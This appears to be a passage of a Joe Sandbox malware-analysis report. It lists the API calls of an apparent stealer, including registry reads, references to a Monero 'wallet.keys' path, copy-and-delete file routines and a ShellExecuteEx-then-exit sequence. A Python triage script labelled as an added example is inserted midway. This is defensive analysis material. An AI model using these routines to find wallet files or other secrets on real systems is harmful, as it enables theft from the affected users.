                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EC7E37
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EC7E3E
                            • RegOpenKeyExA.ADVAPI32(80000002,00A8B730,00000000,00020119,?), ref: 00EC7E5E
                            • RegQueryValueExA.ADVAPI32(?,00A9D640,00000000,00000000,000000FF,000000FF), ref: 00EC7E7F
                            • RegCloseKey.ADVAPI32(?), ref: 00EC7E92
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                             • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: 8b666f3de52e26a0f89397a1bf6c356d97b6cfcb8a07630610ffd92fda4b0601
                            • Instruction ID: f2d68adbbca7d86e724ec5120f5eb5e6b642304e1b3e9913a724a49d5fd01413
                            • Opcode Fuzzy Hash: 8b666f3de52e26a0f89397a1bf6c356d97b6cfcb8a07630610ffd92fda4b0601
                            • Instruction Fuzzy Hash: DC114FB2A44205EFD710CB94DD4AFBBBBB8FB44710F10415DF649A7684D77A58018BA0
                            APIs
                            • StrStrA.SHLWAPI(00A9DAE8,?,?,?,00EC140C,?,00A9DAE8,00000000), ref: 00EC926C
                            • lstrcpyn.KERNEL32(010FAB88,00A9DAE8,00A9DAE8,?,00EC140C,?,00A9DAE8), ref: 00EC9290
                            • lstrlen.KERNEL32(?,?,00EC140C,?,00A9DAE8), ref: 00EC92A7
                            • wsprintfA.USER32 ref: 00EC92C7
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                             • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpynlstrlenwsprintf
                            • String ID: %s%s
                            • API String ID: 1206339513-3252725368
                            • Opcode ID: 6b969194ee70394ef11c093793cab462d0376bd88665eeb9cbefb315c9ecfbfe
                            • Instruction ID: 964856f0569f06536b2ae599ccd332f8042c23f0fd29dd68364e2141bb1fe2ff
                            • Opcode Fuzzy Hash: 6b969194ee70394ef11c093793cab462d0376bd88665eeb9cbefb315c9ecfbfe
                            • Instruction Fuzzy Hash: 7901E575600208FFCB04DFE8D989EAE7BB9FB48354F10854CF9499B605C63AAA41DB90
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EB12B4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EB12BB
                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00EB12D7
                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00EB12F5
                            • RegCloseKey.ADVAPI32(?), ref: 00EB12FF
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                             • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: 7945e58309c0ce721080f2726463c5626d4fc8d5a5ec60ff33f720596ce29fcf
                            • Instruction ID: c11813792bb56a8cb2ca41a1e0ae6a446370635cb91a053f61cef6d352d85ef3
                            • Opcode Fuzzy Hash: 7945e58309c0ce721080f2726463c5626d4fc8d5a5ec60ff33f720596ce29fcf
                            • Instruction Fuzzy Hash: B8011DB9A40208FBDB10DFE0DC4AFAEB7B8EB48705F008159FA4997284D675AA018B50
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: String___crt$Type
                            • String ID:
                            • API String ID: 2109742289-3916222277
                            • Opcode ID: 7730544606e46d5f62b6681d8bd3b276f30118756679b5aad4f547e1871ecbd4
                            • Instruction ID: 168160fa8495a4d8089c9ece9688885c120f2708edc1a03ab5bc5c0aeae603a7
                            • Opcode Fuzzy Hash: 7730544606e46d5f62b6681d8bd3b276f30118756679b5aad4f547e1871ecbd4
                            • Instruction Fuzzy Hash: 4F4109B110075C5EDB258B24CE84FFB7BE89F45708F2454ECE98EA6182D2729A46CF60
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00EC6663
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00EC6726
                            • ExitProcess.KERNEL32 ref: 00EC6755
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                            • String ID: <
                            • API String ID: 1148417306-4251816714
                            • Opcode ID: 10e5301239cd105ee9f0c9d9bee5c37025403977faaca308ec78654fe3cc63b3
                            • Instruction ID: 7cbff3d08bbaa8bafa1af72a4095346a06e13aa8283cdc22a4cf307a405cd37f
                            • Opcode Fuzzy Hash: 10e5301239cd105ee9f0c9d9bee5c37025403977faaca308ec78654fe3cc63b3
                            • Instruction Fuzzy Hash: 0A314AB1900208ABDB14EB50DE86FDD77B8AF48300F40519CF20976181DF766A4ACF69
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00ED0E28,00000000,?), ref: 00EC882F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EC8836
                            • wsprintfA.USER32 ref: 00EC8850
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            • Opcode ID: 7bfa3e65344f291b42e1dcd977eced14e62669462c2b005fbb499b3a3296983d
                            • Instruction ID: f0c19a53c1f178c36b807ba8a2505457feb73a0f29784a2a4da500f800a1d4c6
                            • Opcode Fuzzy Hash: 7bfa3e65344f291b42e1dcd977eced14e62669462c2b005fbb499b3a3296983d
                            • Instruction Fuzzy Hash: E1212EB1A44208EFDB14DF94DD4AFAEBBB8FB48711F10411DF609A7684C77A99018BA0
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00EC951E,00000000), ref: 00EC8D5B
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EC8D62
                            • wsprintfW.USER32 ref: 00EC8D78
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesswsprintf
                            • String ID: %hs
                            • API String ID: 769748085-2783943728
                            • Opcode ID: e400240b4e2dad50101b2ced3136827abf195beddce9df45919524330d6a635b
                            • Instruction ID: 29457fd877270b03f7630dc2b1041a1b61af7566ac33a34c76a139761e9a412e
                            • Opcode Fuzzy Hash: e400240b4e2dad50101b2ced3136827abf195beddce9df45919524330d6a635b
                            • Instruction Fuzzy Hash: 19E08CB5B40308FFC720DB94DC0AE6977B8EB04712F040098FD4E97680DAB69E019BA1
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                              • Part of subcall function 00EC8B60: GetSystemTime.KERNEL32(00ED0E1A,00A9C988,00ED05AE,?,?,00EB13F9,?,0000001A,00ED0E1A,00000000,?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00EC8B86
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EBA2E1
                            • lstrlen.KERNEL32(00000000,00000000), ref: 00EBA3FF
                            • lstrlen.KERNEL32(00000000), ref: 00EBA6BC
                              • Part of subcall function 00ECA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ECA7E6
                            • DeleteFileA.KERNEL32(00000000), ref: 00EBA743
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: c2abc3eafcace718958071512e9e5744f1afbf1517f523b307f9049be2789137
                            • Instruction ID: 232c20254453587e37b7774337f31e7ecf857e606265614dfdfdc117f6ef9c3a
                            • Opcode Fuzzy Hash: c2abc3eafcace718958071512e9e5744f1afbf1517f523b307f9049be2789137
                            • Instruction Fuzzy Hash: 16E11D7381010C9BCB18EBA4DE96FEE7378AF54304F54917DF51672091EE366A0ACB62
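Each "APIs" listing above records, for one function in the memory dump, the Win32 calls the Joe Sandbox IDA plugin resolved (direct calls, and indented "Part of subcall function" lines for calls made from subroutines), the argument tokens visible at the call site, and the call-site address; the "String ID" bullet under "Similarity" carries the string constants the function references. The Python below is an added example and not part of the report or of Joe Sandbox: it parses such listings into records and attaches behaviour labels derived only from the APIs and argument strings present, so the three entries copied from above (the RegOpenKeyExA/RegQueryValueExA read, the wsprintfA routine with the "%dx%d" format string, and the CopyFileA/DeleteFileA routine whose subcall references \Monero\wallet.keys) can be triaged without reading every line. The label names, the treatment of "$" as the separator inside String ID values, and the bullet-prefixed line layout are this example's assumptions about the report format.

```python
"""Parse the per-function "APIs" listings of a Joe Sandbox report and
attach behaviour labels.  Added example; not part of the report or of
Joe Sandbox.  Label names and the "$"-separated String ID format are
assumptions made here, not documented report semantics."""
import re
from dataclasses import dataclass, field

# One API line as the report prints it, e.g.
#   • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00EB12D7
#   • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,\Monero\wallet.keys), ref: 00ECA9C5
#   • wsprintfA.USER32 ref: 00EC8850          (no argument list recorded)
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
# The "String ID" bullet under "Similarity"; values assumed "$"-separated.
STRING_ID_LINE = re.compile(r"^\s*•\s*String ID:\s*(?P<s>.*?)\s*$")


@dataclass
class ApiCall:
    api: str        # e.g. "RegOpenKeyExA"
    module: str     # e.g. "ADVAPI32"
    args: list      # raw argument tokens; "?" where the plugin could not resolve one
    ref: str        # call-site address in the dump
    subcall: str    # callee address when the call happens inside a subroutine, else ""


@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    string_ids: list = field(default_factory=list)

    def direct(self):
        """Calls made by the function itself, not by its subroutines."""
        return [c for c in self.calls if not c.subcall]


def parse_entries(text):
    """Each "APIs" heading starts a new function entry; API bullets and the
    String ID bullet that follow belong to it until the next heading."""
    entries, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionEntry()
            entries.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = [a for a in (m.group("args") or "").split(",") if a]
            current.calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                                         m.group("ref"), m.group("sub") or ""))
            continue
        m = STRING_ID_LINE.match(line)
        if m:
            current.string_ids.extend(s for s in m.group("s").split("$") if s)
    return entries


def label(entry):
    """Behaviour labels for one function, derived only from the APIs and
    argument strings in its listing.  Label names are this example's own."""
    apis = {c.api for c in entry.calls}
    direct = {c.api for c in entry.direct()}
    args = [a for c in entry.calls for a in c.args]
    labels = set()
    if {"RegOpenKeyExA", "RegQueryValueExA"} <= direct:
        labels.add("registry-value-read")
    if {"CopyFileA", "DeleteFileA"} <= direct:
        labels.add("copy-file-then-delete")
    if {"ShellExecuteEx", "ExitProcess"} <= direct:
        labels.add("shellexecute-then-exit")
    if any("wallet" in a.lower() for a in args):
        labels.add("wallet-path-in-arguments")
    if apis & {"wsprintfA", "wsprintfW"}:
        for s in entry.string_ids:
            if "%" in s:
                labels.add("format-string=" + s)
    return labels


def summarise(text):
    """Per entry: direct API names in call order plus its sorted labels."""
    return [([c.api for c in e.direct()], sorted(label(e)))
            for e in parse_entries(text)]


# Constructed input: three listings copied from the report above.
SAMPLE = r"""
APIs
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EB12B4
• RtlAllocateHeap.NTDLL(00000000), ref: 00EB12BB
• RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00EB12D7
• RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00EB12F5
• RegCloseKey.ADVAPI32(?), ref: 00EB12FF
Similarity
• String ID:
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00ED0E28,00000000,?), ref: 00EC882F
• RtlAllocateHeap.NTDLL(00000000), ref: 00EC8836
• wsprintfA.USER32 ref: 00EC8850
  • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
Similarity
• String ID: %dx%d
APIs
  • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EBA2E1
• lstrlen.KERNEL32(00000000,00000000), ref: 00EBA3FF
• DeleteFileA.KERNEL32(00000000), ref: 00EBA743
Similarity
• String ID:
"""

if __name__ == "__main__":
    for apis, labels in summarise(SAMPLE):
        print(" -> ".join(apis), "|", ", ".join(labels))
```

Subcall lines are kept in the record but excluded from the API-sequence labels, because the same helper (for instance 00ECA9B0, which references the wallet path) is listed under many callers and would otherwise label every one of them as a file-copy routine; argument strings, by contrast, are searched across subcalls, since that is the only place the report shows them.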
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                              • Part of subcall function 00EC8B60: GetSystemTime.KERNEL32(00ED0E1A,00A9C988,00ED05AE,?,?,00EB13F9,?,0000001A,00ED0E1A,00000000,?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00EC8B86
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EBD481
                            • lstrlen.KERNEL32(00000000), ref: 00EBD698
                            • lstrlen.KERNEL32(00000000), ref: 00EBD6AC
                            • DeleteFileA.KERNEL32(00000000), ref: 00EBD72B
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
